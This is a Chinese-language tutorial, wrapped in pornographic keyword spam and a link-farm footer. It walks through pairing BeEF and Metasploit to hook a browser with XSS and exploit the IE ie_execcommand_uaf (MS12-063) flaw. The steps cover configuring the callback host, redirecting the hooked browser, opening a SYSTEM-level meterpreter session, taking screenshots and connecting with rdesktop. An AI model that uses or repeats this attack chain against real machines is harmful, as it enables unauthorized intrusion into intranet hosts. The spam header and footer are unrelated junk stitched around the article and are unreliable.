六月婷婷综合激情-六月婷婷综合-六月婷婷在线观看-六月婷婷在线-亚洲黄色在线网站-亚洲黄色在线观看网站

明輝手游網(wǎng)中心:是一個(gè)免費(fèi)提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺(tái)!

metasploit使用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)

[摘要]系統(tǒng):KALI 用到的工具:beEF+msf 利用的IE漏洞是:http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcom...

系統(tǒng):KALI

用到的工具:beEF+msf

利用的IE漏洞是:http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcommand_uaf

MS12-063
AutomaticIE 7 on Windows XP SP3IE 8 on Windows XP SP3IE 7 on Windows VistaIE 8 on Windows VistaIE 8 on Windows 7IE 9 on Windows 7
用到的beef+msf

先配置下:

root@kali:~# cd /usr/share/beef-xss/root@kali:/usr/share/beef-xss# lsbeef beef_key.pem config.yaml db Gemfile modulesbeef_cert.pem bundle core extensions Gemfile.lock
編輯下config.yaml
把metasploit :false改成true

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)1

再進(jìn)入extensions/metasploit/
同樣修改下config.yaml
把host跟callback_host 改成自己的IP 這里是220.128

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)2

再改動(dòng)下custom path:

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)3

這樣beef已經(jīng)配置好了。那就運(yùn)行下metasploit

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)4

運(yùn)行msf后 數(shù)據(jù)庫連接下,不然上線也會(huì)沒有提示的。這里的pass 就是extensions/metasploit/config.yaml里面的pass

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)5

這樣就沒有什么問題。我們可以先看一下beef.數(shù)據(jù)庫只要連上了就不會(huì)出現(xiàn)msf的api錯(cuò)誤的。

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)6

進(jìn)入beef

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)7

賬號(hào)密碼beef 配置文件里面有。beef:beef

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)8

那beef已經(jīng)都OK了。
現(xiàn)在來搞下選擇下要顯示的頁面:

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)9

hook.js 運(yùn)行beef 顯示出來的。
別忘記運(yùn)行下apache。

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)10

我們再進(jìn)入msf

use exploit/windows/browser/ie_execcommand_uaf
可以自己根據(jù)自己的要求來選擇。

show options
port可以自已改。

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)11

我用xp+ie7

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)12

直接訪問下我們的頁面192.168.220.128/xss/
beef就會(huì)顯示出來了。

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)13

點(diǎn)擊 commands-hookeddomain-REDIRECT BROWSER 讓他重新跳轉(zhuǎn)到我們msf生成的地址上。beef很多功能。
把地址改成192.168.220.128:8080(msf生成的地址)

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)14

我們就會(huì)看到msf上面已經(jīng)顯示出來了。 回顯了sessions
payload可以自己去改。我使用的meterpreter載荷

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)15

執(zhí)行sessions -i

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)16

執(zhí)行sessions -i ID號(hào)
可以執(zhí)行任意命令已經(jīng)是系統(tǒng)權(quán)限

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)17

執(zhí)行下screenshost

meterpreter > screenshot Screenshot saved to: /root/dlsSQBkF.jpeg
就可以看到當(dāng)前主機(jī)的屏幕內(nèi)容。

metasploit利用IE漏洞XSS掛馬拿內(nèi)網(wǎng)主機(jī)18

也可以rdesktop 遠(yuǎn)程連接上去。
參數(shù)rdesktop -f ip -u username -p password
這也是一種xss掛馬拿內(nèi)網(wǎng)主機(jī)。

注:鄙人每天都在寫一些metasploit的玩法,如果有大神有什么好的方法希望告訴我,我更新在空間,分享給大家。


上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識(shí),學(xué)習(xí)了安全知識(shí),幾乎可以讓你免費(fèi)電腦中毒的煩擾。




主站蜘蛛池模板: 一区二区久久 | 青草青草视频 | 天天影视综合色 | 综合网 色天使 | 午夜视频1000部免费看 | 一级做a毛片免费视频 | 日韩精品成人 | 欧洲另类一二三四区 | 欧美一区二区三区影院 | 亚洲a级黄色片 | 一级做a爱片特黄在线观看 一级做a爱片久久蜜桃 | 日本高清视频成人网www | 日韩精品不卡 | 中文www新版资源在线 | 青青国产成人久久91网站站 | 青春草在线观看 | 欧美一级高清在线观看 | 中文字幕无码中文字幕有码 | 日韩精品免费看 | 下载一级毛片 | 一二三四免费观看在线8 | 欧美中文字幕在线观看 | 午夜视频h| 天天五月天丁香婷婷深爱综合 | 日韩在线视频精品 | 中文字幕免费观看视频 | 天天射影院 | 色吊丝性永久免费看码 | 日韩在线观看视频免费 | 亚洲欧美在线综合一区二区三区 | 亚洲午夜久久久久久91 | 欧美在线视频第一页 | 天堂网站天堂小说 | 伊人官网 | 天天干狠狠操 | 亚洲一欧洲中文字幕在线 | 晚上正能量91香蕉 | 一级做a爰片久久毛片免费看 | 日本三级2020 | 天堂8中文在线bt | 中文字幕高清免费不卡视频 |